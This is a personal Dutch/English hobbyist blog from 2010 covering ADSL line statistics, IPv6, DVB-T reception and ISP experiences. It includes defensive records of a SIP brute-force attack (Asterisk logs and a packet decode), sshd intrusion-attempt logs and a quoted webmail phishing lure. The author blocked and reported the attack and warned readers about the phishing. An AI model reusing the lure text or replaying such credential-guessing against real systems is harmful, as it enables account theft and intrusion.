Ook een mooie actie: Neelie Kroes krijgt van een mobiele aanbieder een sms die de regels over hoge tarieven wel erg typisch uitlegt. Jammer voor die provider dat Neelie Kroes zelf die regels heeft (mee-) bedacht.

De SpeedTouch 510 levert ook interresante getallen op:

[adsl]=>:adsl info
Modemstate            :  up 
Operation Mode        :  G.DMT Annex B  [ISDN Overlay Mode]
Channel Mode          :  interleaved 
Number of resets      :  2 

Vendor                              Local           Remote   
  Country             :               0f               b5 
  Vendor              :             ALCB             BDCM 
  VendorSpecific      :             0000             6291 
  StandardRevisionNr  :               01               01 

                                  Downstream        Upstream 
Margin       [dB]     :              6.5              9.0 
Attenuation  [dB]     :             24.0             12.0 
OutputPower  [dBm]    :             18.5             12.0 

Available Bandwidth                 Cells/s           Kbit/s 
  Downstream          :            16905             7168 
  Upstream            :             2113              896 

Transfer statistics

    Errors 
      Received FEC    :              988 
      Received CRC    :              583 
      Received HEC    :              447 
      Transmitted FEC :               21 
      Transmitted CRC :               42 
      Tranmsitted HEC :               34 

Nog geen 8 megabit (het is geen adsl2 of adsl2+, dus ergens bij 8000 zit wel de limiet) en de errorcounters lopen al op.

Gisterenavond maar eens de xs4all klantenservice gebeld over de matige ADSL snelheid en de regelmatige hikken. Dat was even flink in de wacht staan: ondanks de aankondiging dat het "iets meer dan 1 minuut wachttijd" zou zijn duurde het bijna 25 minuten om iemand aan de lijn te krijgen. Eigenlijk wilde ik gewoon een downgrade naar 8 megabit om van het probleem af te zijn. Maar aan de hand van mijn beschrijving van de problemen en de metingen en logs aan de kant van xs4all kwam de medewerker van de klantenservice met de suggestie dat het wel eens een storing aan het modem of aan de telefoonlijn zou kunnen zijn. De aanpak is nu om het eens met een ander modem te proberen, en aan de hand van wat dat oplevert KPN er op uit te sturen om eventuele roestige verbindingen in de lijn te vinden en/of alsnog een downgrade aan te vragen. Ik ben eens begonnen met het modem van ADSL2+ mode terug te zetten naar ADSL2 en dat levert interresante getallen op:

=>:adsl info
Modemstate            :  up 
Operation Mode        :  G.992.3 Annex B
Channel Mode          :  interleaved 
Number of resets      :  116 

Vendor                              Local           Remote   
  Country             :               0f               b5 
  Vendor              :             TMMB             BDCM 
  VendorSpecific      :             0000             ff91 
  StandardRevisionNr  :               00               02 

                                  Downstream        Upstream 
Margin       [dB]     :              8.0              8.0 
Attenuation  [dB]     :             18.5             12.0 
OutputPower  [dBm]    :             19.0             12.5 

Available Bandwidth                 Cells/s           Kbit/s 
  Downstream          :            18030             7645 
  Upstream            :             2426             1029 

Transfer statistics
    Errors 
      Received FEC    :          2333249 
      Received CRC    :           305427 
      Received HEC    :            14957 
      Transmitted FEC :                0 
      Transmitted CRC :           123909 
      Transmitted HEC :           230400 

ondanks dat de snelheid aangepast is blijven er relatief veel errors langskomen. Vanavond eens met een SpeedTouch ST510i proberen, en ik heb binnenkort beschikking over een andere ST546i.

Even een warm hart toedragen aan de goede zaak:

Persbericht IPv6 taskforce

Donderdag 25 november worden voor de tweede keer de IPv6 Awards uitgereikt aan de beste Nederlandse implementaties. Als IPv6 Task Force roepen wij bedrijven, internet service providers, overheden, onderwijsinstellingen en ook particulieren op zich aan te melden voor de IPv6 awards 2010. Heeft u een toepassing op het gebied van IPv6 geïmplementeerd? Schrijf u dan voor 1 november in voor de IPv6 Awards 2010 en maak kans op een mooie prijs!

Prijzen per categorie

• Bedrijfsleven: €10.000,-
• Overheid & Not for profit: winnaar van deze categorie ontvangt een week senior consultancy, vrij opneembaar
• Onderwijs & onderzoeksinstellingen: €15.000,-
• Internet Service Providers: €15.000,-
• Particulieren: winnaar van deze categorie ontvangt een laptop met gratis gebruik van één jaar mobiel internet en KPN Hotspots
• Publicatie & onderzoekscurriculum: winnaar van deze categorie ontvangt een laptop met gratis gebruik van één jaar mobiel internet en KPN Hotspots

Bij het selecteren van de winnaars zal de jury letten op motivatie, relevantie, toewijding, implementatie en impact. De prijzen zijn beschikbaar gesteld door: KPN, Stichting NLnet, SIDN, Stratix, SURFnet, XS4ALL

De uitreiking van de awards zal plaatsvinden op donderdag 25 november tijdens het ECP-EPN jaarcongres in het Fortis Circus theater in Scheveningen. Voor meer informatie over de IPv6 awards of om direct in te schrijven: http://www.ipv6-taskforce.nl/awards/.

Noodzakelijke overstap naar IPv6

Door een alsmaar grootschaliger gebruik van het internet raken de huidige adresreeksen op hetinternet (IPv4) in 2011 op. Om ervoor te zorgen dat dit niet tot problemen leidt is er een nieuw adressysteem, genaamd IPv6, bedacht. Het is belangrijk dat Nederlandse bedrijven, internet service providers, overheden, onderwijsinstellingen en ook particulieren gaan beseffen dat de overstap naar dit nieuwe adressysteem noodzakelijk is en dat zij tijdig maatregelen kunnen en moeten nemen om de overstap naar IPv6 mogelijk te maken (en de kosten onder controle te houden). Goede implementaties van IPv6 kunnen volgens de IPv6 Task Force een voorbeeldfunctie hebben.

Vandaag had ik de tijd om even langs het xmsnet huis in Utrecht te gaan om eens te vragen naar de voortgang. Ik heb tijden geleden aangegeven bij de xmsnet utrecht postcodecheck dat ik wel interresse heb, maar daar kwam nooit een reactie op. Een medewerker van xmsnet heeft het even nagevraagd en de aanvraag is keurig opgenomen in het systeem maar de interesse in onze buurt is niet groot genoeg op dit moment om te gaan graven, en dat kan afhankelijk van allerlei factoren nog maanden of jaren duren.

Het fiber-to-my-home project schiet dus nog niet op. En dat terwijl het televisie aanbod bij xmsnet (van glashart media) al het verschil met ziggo basis televisie waard is. Technisch op den duur ook: opnemen van digitale televisie met behulp van de computer is iets wat door xmsnet niet geblokkeerd wordt.

Misschien toch maar eens wat buren enthousiast proberen te maken. Dat helpt altijd volgens de mensen van xmsnet. Hallo buren in "Plan 60" in Overvecht in Utrecht: U wilt glasvezel van xmsnet.
Update 2010-07-19: In andere gebieden van Nederland gaat de glasvezel makkelijker: Henk van de Kamer kan in Aalten glasvezel verwachten. En doet dat dus ook van harte. Opmerkelijk is ook dat als 40% van de potentiele aansluitingen zich vooraanmelden het aangelegd kan worden naar alle aanmelders en bij 60% naar alle potentiele aansluitingen, waarbij de niet-klanten dan gewoon een glasvezel koppelpunt in de meterkast krijgen waar verder geen diensten op aangeboden worden. Op zich is dat natuurlijk wel iets wat je huis potentieel meer waard maakt, een glasvezel koppelpunt in de meterkast. Jammer dat je als huiseigenaar in dit land nog nergens de mogelijkheid hebt om te zeggen "doe maar, en ik neem (een deel van) de initiele investering over".

Wardriving results 24 April - 14 July: 9419 new networks with GPS locations according to WiGLE.

The Hurricane Electric IPv4 Exhaustion Counter on this page has dropped below 365 days. What does this mean exactly?

At the end of that period there will be no more IPv4 address blocks to give out to the several Regional Internet Registries. But those have their own buffers so it won't be all over at that moment (and the IPv4 Internet will not stop functioning either).

What will happen is that when those buffers run out the moment will come that one of those Regional Internet Registries will have to answer "NO, not available" to a request for IPv4 space. The timeframe at which this will happen may vary between months (APNIC, Asia-Pacific region) and years (AfriNIC, Africa) given the current rates. What this will mean is a situation where IPv6 is the only working way to give new systems on the Internet working unique addresses. Will the world be ready for this moment? Probably not.

Het reactieformulier van de Gemeente Utrecht werkt, ik heb er al een paar keer wat ingestuurd en alle keren een nette reactie op gehad. Recent vroeg ik of de gemeentebelastingen ook betaald zouden kunnen worden via de digitale nota en dat bleek op de planning te staan voor 2011. Ik heb nu eenmaal liever iets met controle voor ik betaal en dus niet automatische incasso, wat ze de laatste jaren wel aan het promoten waren. Maar het komt dus goed als de planning doorgaat.

A night with a heavy thunderstorm and high numbers of lightning strikes detected. No local damage, we just saw hailstones come down, break up and the parts still fly around for over a meter. So we were glad we weren't outside at that time.

Available now: repocafe, our subversion self-service webinterface.

De website van het Antenneregister van het antennebureau van het Agentschap Telecom is (eindelijk) vernieuwd. Vaste installaties van radiozendamateurs zouden er ook in vermeld moeten gaan worden maar ik kan die laag nog niet aanzetten en ik zie ze ook niet op de kaartjes.

Eindelijk zijn de overige gegevens ook bijgewerkt en staat de zendmast Lopik te IJsselstein er niet meer in met een stapel analoge televisiezenders maar met DVB-T zenders. Het valt me wel op hoeveel omroep zenders er eigenlijk in stedelijke gebieden staan, die verwachtte ik toch meer op plekken zoals de zendmast Lopik.

Gespot door Website Antenneregister (eindelijk) vernieuwd: behalve C2000 vrijwel alle antennes in kaart - FMCNL op Twitter

A sort-of information leak showing the link between IPv4 and IPv6 addresses (if you had any hope the link between those might be a secret):

Jul  8 15:15:25 abaris named[5327]: client 2001:470:xxxx:xxxx::2#33086: received notify for zone 'ckts.info'
Jul  8 15:15:25 abaris named[5327]: zone ckts.info/IN: refused notify from non-master: 2001:470:xxxx:xxxx::2#33086
Jul  8 15:15:25 abaris named[5327]: client 68.178.91.34#33085: received notify for zone 'ckts.info'
Jul  8 15:15:25 abaris named[5327]: zone ckts.info/IN: refused notify from non-master: 68.178.91.34#33085

Timing and portnumbers make it quite visible that those addresses are in use by the same machine. Other protocols can probably give the same results, for example with http and cookies I could link IPv4 and IPv6 addresses.

A problem? Not to me. Privacy by obscurity? Don't expect it.

Ik was benieuwd naar de HCC!dagen 2010, en ik zag in een nieuwsbericht van de HCC Thema's HCC!dagen 2010. Met als quote:

Hiermee doet HCC haar naam eer aan: HCC, de vereniging van computergebruikers!

Nee, HCC staat voor hobby computer club, maar dat willen ze allang niet meer zijn.

Soms moet je het niet kunnen vinden van uitleg omdat 'iedereen dat weet' omzetten in een eigen uitleg waarin juist al die dingen staan die 'iedereen weet'. Op de hoofdpagina van PI1UTR kon ik wel vinden

Graag de repeater terug linken naar reflector 17A ,vergeet u dit, dat kan gebeuren de repeater connect naar 15 minuten automatisch weer reflector 17A

Alleen niet hoe dat dan gaat, een reflector linken of unlinken. Iets wat voor een gloednieuwe D-STAR gebruiker niet direct logisch zal zijn. Met behulp van de Australian D-STAR Information en specifiek de Australian D-STAR Repeater Linking User Guide Version 1.1 kon ik beredeneren hoe dat moest, en dat heb ik beschreven op de D-STAR digitale amateur radio. Nu staat het eens ergens, en het is een goed startpunt om meer D-STAR procedures te documenteren. En mocht ik fouten maken in die pagina, dan klaagt er vast iemand.
Update 2010-07-08: En dan is er wel een handleiding te vinden: Hoe te linken - www.d-star.nl. Magoed, daar kan ik mijn aantekeningen mee vergelijken.

The vision of T-mobile USA for the near future: IPv6 is the network protocol, IPv4 is "legacy" and will be hidden behind NAT64 gateways. Content providers better take note:

"Our users are going to access your content over IPv6. The only relevant question is 'will we make the AAAA record or will you?' Wouldn't you rather be the one to do it so you have control?"

Time for content-providers to think about IPv6 strategy. Via T-Mobile is pushing IPv6. Hard. - Living with IPv6.

De ADSL lijnsnelheid is nogsteeds voodoo. Tijdens onze vakantie heeft het er zelfs een dag uitgelegen, maar dat was niet op ADSL niveau. Alleen kon er geen sessie opgebouwd worden met xs4all. Later in die vakantie ging de download snelheid naar 8083 kilobit en bleef daar. Na een softwarematig schopje in het modem ging de snelheid weer naar ruim 14 megabit maar na een poosje stabiliseerde het zich op 12334 kilobit. Het is dat er geen abonnement tussen 8 en 16 megabit zit, maar met al deze instabiliteit is 8 megabit misschien toch weer veiliger.

Slowly but surely the subversion self-service webinterface we developed at work is turning into a 2.0 version which will be available as open source. I must say "my boss developed", he did most of the coding. I just threw ideas, designs and criticism at him :)

It was our original plan to open-source it, and this plan was woken up again when we got a request about the availability of the source code. Lots of work was done to make structures more flexible and remove hardcoded dependencies on internal infrastructure.

One of the bigger design issues was a good name! For historical reasons we couldn't use the name repoman which was good wordplay on repository-manager in itself. We settled on repocafe. Available for download Real Soon Now™.

Back from a holiday in England! We stayed in a house which was an old manor, complete with a kitchen which once had a coal-fired Aga stove as a modernisation. More modern things like a microwave were added too, but the Aga stove was quite something. It already had the upgrade to heating oil. We cycled from home to the IJmuiden - Newcastle ferry and wanted to cycle from Newcastle to the cottage near Wooler. But the hills of Northumbria got us and we gave up after 65 kilometers and had someone with a car pick us up. We had a great week. One of the highlights was a visit to the Farne Islands were the opportunities for bird-watching and photography were enormous.

Cycling in England was doable: marked cycle routes from Newcastle were going where we wanted to go. Some cycleways are old railway lines and not all are paved. A recumbent and gravel do not mix very well. Most cycle routes are on quiet back roads but we did ride on some A-roads. Which was no problem: cars gave us space and were patient. But hills with up to 20% ascent got us eventually. Or rather the fact that after each hill comes another which makes the average speed go down a lot.

Thinkbroadband, a site about ADSL/cable internet in the UK asked UK broadband providers about IPv6 and got some interesting answers, including:

"[IPv6] has not been released in the market"
"We support IP version 5, but I'm not too sure about 6"
"[We] would advise you to use version 4 [..] Version 6 never always works"

These are the companies which will face the IPv4 address shortage when you want a connection. Ok, these answers are from the support desk and not from network design but still...

Found via Broadband providers & router manufacturers failing to support IPv6 - Fix6.

In mijn werk heb ik natuurlijk ook veel te maken met de universitaire automatiseringsprojecten. Vandaag las ik een prachtige filosofische beschouwing van het leerlingvolgsysteem: God bestaat en zijn naam is OSIRIS.

You can now lose your privacy on facebook via IPv6 too! http://www.v6.facebook.com/. It won't make me visit facebook but it is good when such a popular service starts offering IPv6 connectivity. Facebook is also probably a big customer of load balancers and they can use that power to improve IPv6-capable load balancers. First spotted at Facebook over IPv6 - Fix6 IPv6 news and info.

I picked up the at this moment cheap outside DVB-T antenna from KPN which didn't even have a KPN logo, just Funke. It is the Funke DSC310. It came with 10 meter antenna cable and mounting materials. I went to Radio Centrum, the local electronics shop and picked up a König DVB-T power inserter. The mounting materials for the Funke antenna include a clamp for a pipe so I used a broomstick to raise the antenna out the window.

The results were spectacular. Depending on antenna orientation (the DSC310 is directional) I received 19 to 22 transmitters with in total 208 to 234 services (with a lot of duplicate Digitenne services). Details in the DVB-T reception log for 10 June 2010.

Notable new services: Digitenne multiplex 1 Zuid-Holland Zuid with TV Rijnmond and Digitenne multiplex 1 Zuid-Holland Noord with TV west.

Update 2010-06-13: I just noticed browsing those results with some more time and energy available that I also had WDR Mux 2 Aachen at 602 MHz in one direction, which is new for the home location. The reason I did not notice before is that my script to generate the logbook did not see that frequency as 'new' because I have seen it in Limburg, the southern part of the Netherlands.

According to DVB-T Frequenties - Wikipedia Nederland the 602 MHz transmitter is the one at Aachen-Stolberg which is 167 kilometer distance. A new DX record!

Distance calculations using Calculate distance, bearing and more between Latitude/Longitude points and normal reach calculations using VHF/UHF TV Line of Sight Calculator. The line of sight calculator shows me both this distance and the 112 kilometer to Sender Wesel are above the normal reach of those transmitters.

Ik zat weer eens te bladeren of er nog een leuke tweedehands antenne te vinden was voor de DVB-T DX experimenten en kwam deze tegen: Fuba yagi uhf tv type d. Gezien het specifieke type D en de lengte op de foto is dit een Fuba XC391-D en die is dus 2 meter 25 lang, volgens Frage zur Fuba XC391 Yagi - DIGITAL FERNSEHEN - Forum Duits. Een beetje ernstig groot voor een antenne die binnen blijft, dus die gaat het niet worden ook al is het erg weinig geld voor zo'n goeie UHF TV antenne. Zonder mast en rotor is dat geen handige antenne en ik heb even andere prioriteiten dan die op het dak knutselen.

Opmerkelijk is trouwens dat de buitenantenne voor Digitenne bij KPN momenteel 6.75 kost (verzendkosten?) terwijl volgens mij dezelfde Funke buitenantenne bij satshop 34.95 kost. Voor die 6.75 kan ik het niet laten, ik heb er ook een besteld bij KPN. Je hoeft er geen Digitenne klant voor te zijn.

Bron foto: 08-11-20 + Ophef ﹧ ﹧- GALERIEopWEGLicentie: cc-by-sa

Een absoluut dieptepunt in de geschiktheid van hccnet.nl als e-mail provider:

   ----- Transcript of session follows -----
... while talking to hcc3.schonemail.nl.:
>>> DATA
<<< 554 5.7.1 o54IQsMt007321: Found several indications this message is likely to be spam.
554 5.0.0 Service unavailable

Hetzelfde mailtje sturen zonder pgp-signature gaat ongestoord. Dan hebben ze het ook totaal niet begrepen daar. Gelukkig ben ik niet van ze afhankelijk voor e-mail, dan zou ik een 0900 nummer moeten bellen om uit te leggen dat ze het niet begrepen hebben en mijn uitgaande mail verstoren. Nu is het alleen een ergernis om sommige mensen te kunnen bereiken, die dit zelf ook een goeie aanleiding vinden om eens naar wat anders uit te kijken.

Naar aanleiding van een opmerking in FTD-vonnis is 'schokkend' en 'onhoudbaar' - Webwereld :

"Sinds 1983 is er niet zo'n verstrekkende uitspraak van een Nederlandse rechter op auteursrechtelijk gebied geweest", reageert Christiaan Alberdingk Thijm, advocaat bij SOLV, doelend op het Kabelpiraten-arrest uit 1983

heb ik even zitten lezen in het kabelpiraten-arrest en wat dingen er om heen gezocht. Het Kabelpiraten-arrest kwam er op neer dat de rechter KTA (kabeltelevisie Amsterdam) gebiedde om maatregelen te nemen zodat op het Amsterdamse kabelnet geen films meer doorgegeven werden die de tv-piraten er op zetten omdat anders KTA verantwoordelijk was voor de gederfde auteursrechten inkomsten.

Een beetje bladeren op het www en in youtube levert mooie verhalen op over TV-piraten die begin jaren 80 zich prima vermaakten met kabelnetwerken of als zelfstandige lokale TV-zender. De toen nog jonge kabel TV netwerken hadden gevoelige antennes om buitenlandse (duitse en belgische) TV zenders te ontvangen maar als die zenders uitgingen na zendersluiting konden TV-piraten redelijk simpel op die antennes instralen met de PAL-RF modulator van een videorecorder (toen net redelijk verkrijgbaar) en een lineaire versterker. Of in gebieden zonder kabel draaiden complete regionale TV zenders. Wat allemaal niet mocht: we hadden Nederland 1 en Nederland 2 en lokale tv en/of commerciële TV was niet de bedoeling van het Nederlandse omroepbestel.

Ik heb dat natuurlijk allemaal gemist, ik was toen nog zo jong dat ik gewoon op tijd naar bed moest en niet op het idee kwam om na zendersluiting nog alle voorkeuzes af te zoeken naar rare programma's (en het heeft voorzover ik kon vinden ook niet zo gespeeld in Nieuwegein / Utrecht). Overdag zocht ik wel eens of er nou echt niet meer op de kabel stond dan wat we wisten, wat voorzover ik me kan herinneren een keer heeft opgeleverd dat ik net iets vroeger doorhad dat er een zender bijkwam.

• Geschiedenis van de Eerste Egmondse Vrije Televisie in nieuwsberichten
• Item TV-piraterij uit het Nederlandse nieuwsoverzicht 1981 (Youtube)

Marco Hogewoning presented the IPv6 CPE survey at the recent RIPE Meeting in Prague. RIPE Labs now has the results on-line: IPv6 CPE Survey, what equipment is available at the moment to get IPv6 at home and what is it compatible with. There is a scary story in the lack of width of the resulting matrix: only a few vendors support IPv6 and not the ones (Alcatel / Speedtouch / Thomson / Technicolor or whatever they are called today) which produce the really big numbers.

Vanavond was het wel lastig dat we het zonder CNN moeten stellen op de analoge kabel in Utrecht omdat ik toen ik thuis kwam wel wilde weten wat de laatste ontwikkelingen waren rond de situatie rond de situatie in het midden-oosten. Je zou bijna met een palestijnse vlag gaan zwaaien in plaats van met een oranje.

Messages from the Barracuda E-mail filter are quite useless. When you request information about a specific IP being blocked you get the very, very generic story:

We are sorry you have reached this page because an email was blocked based on its originating IP address having a "poor" reputation. The "poor" reputation may have been caused by one of the following reasons:

• Your email server contains a virus and has been sending out spam.
• Your email server may be misconfigured.
• Your PC may be infected with a virus or botnet software program.
• Someone in your organization may have a PC infected with a virus or botnet program.
• You may be utilizing a dynamic IP address which was previously utilized by a known spammer.
• Your marketing department may be sending out bulk emails that do not comply with the CAN-SPAM Act.
• You may have an insecure wireless network which is allowing unknown users to use your network to send spam.
• In some rare cases, your recipient's Barracuda Spam Firewall may be misconfigured.

Which is completely useless when you need information what is causing this listing and whether the spam flow is already stopped. I'm not gambling on trying the 'request removal' link until I know what is causing this.

Barracuda mail filtering: NOT helping solve the spam problem. With some Evil Greedy Corporation conspiracy thinking: really helping stop spam would be bad for business in the long run for Barracuda.

De niet maximale snelheid van de ADSL ligt duidelijk niet aan de binnen bekabeling. Ondertussen staat het ADSL modem beneden in de meterkast en is er uit het afbreken van die telefoonlijn naar zolder een interresante verbinding gekomen. Ook een testje zonder ADSL splitter leverde geen echte verandering op. Grappig is dat na het terugzetten van de splitter de snelheid iets omhoog is gegaan (van 13 megabit naar 15 megabit). Gaat vast wel weer een keer omlaag. Ooit had ik een 2draads huurlijn op maar liefst 33.6 kilobit die bij zware regenbuien naar 28.8 kilobit of zelfs minder wegzakte, daar moet ik nu aan terugdenken.

=>:adsl info                     
Modemstate            :  up 
Operation Mode        :  G.992.5 Annex B
Channel Mode          :  interleaved 
Number of resets      :  19 

Vendor                              Local           Remote   
  Country             :               0f               b5 
  Vendor              :             TMMB             BDCM 
  VendorSpecific      :             0000             ff91 
  StandardRevisionNr  :               00               02 

                                  Downstream        Upstream 
Margin       [dB]     :              6.5             16.0 
Attenuation  [dB]     :             21.5             12.5 
OutputPower  [dBm]    :             20.5             13.0 

Available Bandwidth                 Cells/s           Kbit/s 
  Downstream          :            35702            15138 
  Upstream            :             2426             1029 

The good thing about trying to receive distant transmitters via dvb-t is: when it works, all the results are on the computer. So there is now a script which converts the scan results from all the DVB-T dx experiments into a nice webpage: DVB-T reception log.

The Tropospheric ducting forecast for Northwest Europe showed not much happening yesterday evening but I tried a dvb-t scan anyway. No foreign services, but the highest score in services from the Netherlands: 16 active frequencies with 180 services in total. The new find: Digitenne Mux 3 on 554 MHz.

I guess some kind of bug in the sipscanner at 193.55.30.2 got triggered by my firewalling the IP so asterisk does not 'see' the traffic. The incoming traffic is now up to 70 kilobyte/second. It is all ignored, but that is still a fair chunk of incoming bandwidth being eaten.
Update 2010-05-24 I let asterisk answer the requests for a few packets which slowed down the incoming traffic again to something reasonable. And this morning the traffic was gone which suggests somebody read my report to the security contact.

I saw interesting conditions coming up on the Tropospheric ducting forecast for Northwest Europe so I ran a dvb-t scan and indeed found:

tune to: QAM_16   f = 674000 kHz I999B8C23D0T8G4Y0 
SDT (actual TS)
        service = MDR S-Anhalt (ARD)
        service = NDR FS NDS * (ARD)
        service = SWR Fernsehen RP (ARD)
        service = WDR Düsseldorf (ARD)
        service = WDR Wuppertal * (ARD)
        service = WDR Duisburg (ARD)

tune to: QAM_AUTO f = 690000 kHz I999B8C999D999T999G999Y999 
SDT (actual TS)
        service = arte (ARD)
        service = Phoenix (ARD)
        service = Einsfestival (ARD)
        service = Das Erste (ARD)

tune to: QAM_AUTO f = 746000 kHz I999B8C999D999T999G999Y999 
SDT (actual TS)
        service = ProSieben (ProSiebenSat.1)
        service = SAT.1 (ProSiebenSat.1)
        service = kabel eins (ProSiebenSat.1)
        service = N24 (ProSiebenSat.1)

No extra services from the east of the Netherlands, so this must have been some interesting tropospheric ducting. First time for ARD and Prosieben/Sat.1, I have seen the WDR multiplex on that frequency before from Brunssum, a sign this must be a single frequency network. Searching DVB-T Sender Tabelle shows the transmitter at Wesel is the most likely source, a distance of 112 kilometer.

Just got in and noticed that the adsl link was particularly s-l-o-w. A tcpdump showed that there was a SIP brute-force attack going on, and with the wondershaper settings this was filling the ADSL upstream to the maximum. In the asterisk logs:

[May 22 14:49:08] NOTICE[11238] chan_sip.c: Registration from '"607589258"<sip:607589258@82.95.196.202>' failed for '193.55.30.2' - No matching peer found
[May 22 14:49:08] NOTICE[11238] chan_sip.c: Registration from '"2737039014"<sip:2737039014@82.95.196.202>' failed for '193.55.30.2' - No matching peer found
[May 22 14:49:08] NOTICE[11238] chan_sip.c: Registration from '"hello"<sip:hello@82.95.196.202>' failed for '193.55.30.2' - No matching peer found
[May 22 14:49:08] NOTICE[11238] chan_sip.c: Registration from '"ranger"<sip:ranger@82.95.196.202>' failed for '193.55.30.2' - No matching peer found
[May 22 14:49:08] NOTICE[11238] chan_sip.c: Registration from '"shadow"<sip:shadow@82.95.196.202>' failed for '193.55.30.2' - No matching peer found
[May 22 14:49:08] NOTICE[11238] chan_sip.c: Registration from '"baseball"<sip:baseball@82.95.196.202>' failed for '193.55.30.2' - No matching peer found
[May 22 14:49:08] NOTICE[11238] chan_sip.c: Registration from '"donald"<sip:donald@82.95.196.202>' failed for '193.55.30.2' - No matching peer found
[May 22 14:49:08] NOTICE[11238] chan_sip.c: Registration from '"harley"<sip:harley@82.95.196.202>' failed for '193.55.30.2' - No matching peer found
[May 22 14:49:08] NOTICE[11238] chan_sip.c: Registration from '"hockey"<sip:hockey@82.95.196.202>' failed for '193.55.30.2' - No matching peer found
[May 22 14:49:08] NOTICE[11238] chan_sip.c: Registration from '"letmein"<sip:letmein@82.95.196.202>' failed for '193.55.30.2' - No matching peer found

[May 22 17:46:24] NOTICE[11238] chan_sip.c: Registration from '"active" <sip:active@82.95.196.202>' failed for '193.55.30.2' - No matching peer found
[May 22 17:46:24] NOTICE[11238] chan_sip.c: Registration from '"active" <sip:active@82.95.196.202>' failed for '193.55.30.2' - No matching peer found
[May 22 17:46:24] NOTICE[11238] chan_sip.c: Registration from '"active" <sip:active@82.95.196.202>' failed for '193.55.30.2' - No matching peer found
[May 22 17:46:24] NOTICE[11238] chan_sip.c: Registration from '"active" <sip:active@82.95.196.202>' failed for '193.55.30.2' - No matching peer found
[May 22 17:46:24] NOTICE[11238] chan_sip.c: Registration from '"active" <sip:active@82.95.196.202>' failed for '193.55.30.2' - No matching peer found
[May 22 17:46:24] NOTICE[11238] chan_sip.c: Registration from '"active" <sip:active@82.95.196.202>' failed for '193.55.30.2' - No matching peer found
[May 22 17:46:24] NOTICE[11238] chan_sip.c: Registration from '"active" <sip:active@82.95.196.202>' failed for '193.55.30.2' - No matching peer found
[May 22 17:46:24] NOTICE[11238] chan_sip.c: Registration from '"active" <sip:active@82.95.196.202>' failed for '193.55.30.2' - No matching peer found
[May 22 17:46:24] NOTICE[11238] chan_sip.c: Registration from '"active" <sip:active@82.95.196.202>' failed for '193.55.30.2' - No matching peer found
[May 22 17:46:24] NOTICE[11238] chan_sip.c: Registration from '"active" <sip:active@82.95.196.202>' failed for '193.55.30.2' - No matching peer found

For a total of 284970 attempts. Then I updated the firewall to block this. And send out an abuse report to the ISP.

With tshark the attacks look like:

Session Initiation Protocol
    Request-Line: REGISTER sip:82.95.196.202 SIP/2.0
        Method: REGISTER
        [Resent Packet: False]
    Message Header
        Via: SIP/2.0/UDP 127.0.0.1:5091;branch=z9hG4bK-1064873464;rport
            Transport: UDP
            Sent-by Address: 127.0.0.1
            Sent-by port: 5091
            Branch: z9hG4bK-1064873464
            RPort: rport
        Content-Length: 0
        From: "instruct" <sip:instruct@82.95.196.202>
            SIP Display info: "instruct" 
            SIP from address: sip:instruct@82.95.196.202
        Accept: application/sdp
        User-Agent: friendly-scanner
        To: "instruct" <sip:instruct@82.95.196.202>
            SIP Display info: "instruct" 
            SIP to address: sip:instruct@82.95.196.202
        Contact: sip:123@1.1.1.1
            Contact Binding: sip:123@1.1.1.1
                URI: sip:123@1.1.1.1\r
                    SIP contact address: sip:123@1.1.1.1\r
        CSeq: 1 REGISTER
            Sequence Number: 1
            Method: REGISTER
        Call-ID: 3859238695
        Max-Forwards: 70

Glenn Fleishman (wireless network expert) has taken the time to completely read and analyze the class-action suit against google for collecting public data from wi-fi networks and tears it to pieces:

You're broadcasting data in an unlicensed band. You have no reasonable expectation of privacy over openly broadcast data.

In my opinion google should not have collected this data. It still sounds like installing kismet and forgetting to configure it completely. Google should wipe this data immediately. Not hand it over to any law enforcement because law enforcement should not have this data either, it should be wiped thoroughly. But starting a stupid lawsuit with falsehoods and lies like:

9. In 2006, Google generated programming code that sampled and decoded all categories of publicly broadcast WiFi data. This type or class of program is commonly called a packet analyzer, also known as a network analyzer, protocol analyzer or packet sniffer, or for particular types of networks, an Ethernet sniffer or wireless sniffer ("wireless sniffer"). As data streams flow across the wireless network, the sniffer secretly captures each packet (or discreet package) of information, then decrypts / decodes and analyzes its content according to the appropriate specifications.

10. To view data secretly captured by a wireless sniffer in readable or viewable form, after being captured and stored on digital media, it must then be decoded using crypto-analysis or similar programming or technology. Because the data "as captured" by the wireless sniffer is typically not readable by the public absent sophisticated decoding or processing, it is reasonably considered and understood to be private, protected information by users and operators of home- based WiFi systems.

I get worked up just having to point out the lies and false acquisations in this part. I really hope this suit by Vicki van Valin and Neil Mertz backfires on them.

Running kismet from a wardriver-CD will yield you the same data unless kismet was configured (not the default!) to not save that data. So the above statements are false.

Webmail account phishers sometimes write interesting works of fiction:

We are currently performing maintenance on our Digital webmail Server because it has come to our notice that one or more of our internet subscribers are introducing a very severe virus into our system, thereby hacking into our esteemed customers private data, and this is affecting our network performance by all standards, as well as causing our customers like you so much complications.

.. and after this bit of bad news about the provider their systems seem to be so damaged by the virus they need to ask for the domain name:

In order to ensure you do not experience service interruption, kindly you reply to this email immediately and enter your Domain Name: for example, mail.icb.com.

.. please don't respond to these. Please.

No this is not the result of an artillery attack on a swimming pool, this was the weather in Oklahoma city on 16 May 2010. Source: Monster hail storm slams Oklahoma city - TornadoVideos.Net

End of an era: Duke university is to shut down their Usenet server, the place where it all started.

This week marks the end of an era for one of the earliest pieces of Internet history, which got its start at Duke more than 30 years ago.

On May 20, Duke will shut down its Usenet server, which provides access to a worldwide electronic discussion network of newsgroups started in 1979 by two Duke graduate students, Tom Truscott and Jim Ellis.

Working with a graduate student at UNC-Chapel Hill, they came up with a simple program to exchange messages and files between computers at Duke and UNC using telephone modems.

Maybe newer services like twitter and facebook have taken over, but there is still nothing compared to the distributed nature of Usenet. Those services all have centralized storage of their data which means there is one place to delete it. With Usenet, you can't unpublish anything. This is both a blessing and a curse.

Source: Duke To Shut Down Usenet Server - Slashdot

Ik heb van het weekend eens voor de aardigheid een proefexamen radio amateur novice gedaan. Zonder enige studie vooraf een score van 27 van de 40, om het te halen is een score van 29 nodig. Blijkbaar is er genoeg van mijn MTS electronica blijven hangen. Op specifieke radio techniek en de regels moet ik nog wel het nodige studeren als ik een licentie zou willen halen.

After a discussion in which I got to quote the Reply-To munging considered harmful I upgraded Ubuntu on my laptop and noticed Thunderbird 3.0.4 recognizes mailing list headers and gives 'Reply', 'Reply all' and 'Reply list' headers depending on what would be correct. Finally!

Amusing log entries:

May 11 09:17:01 greenblatt sshd[17063]: Invalid user !@#$%^ from 82.228.181.124
May 11 09:17:03 greenblatt sshd[17076]: Invalid user !@#$%^& from 82.228.181.124
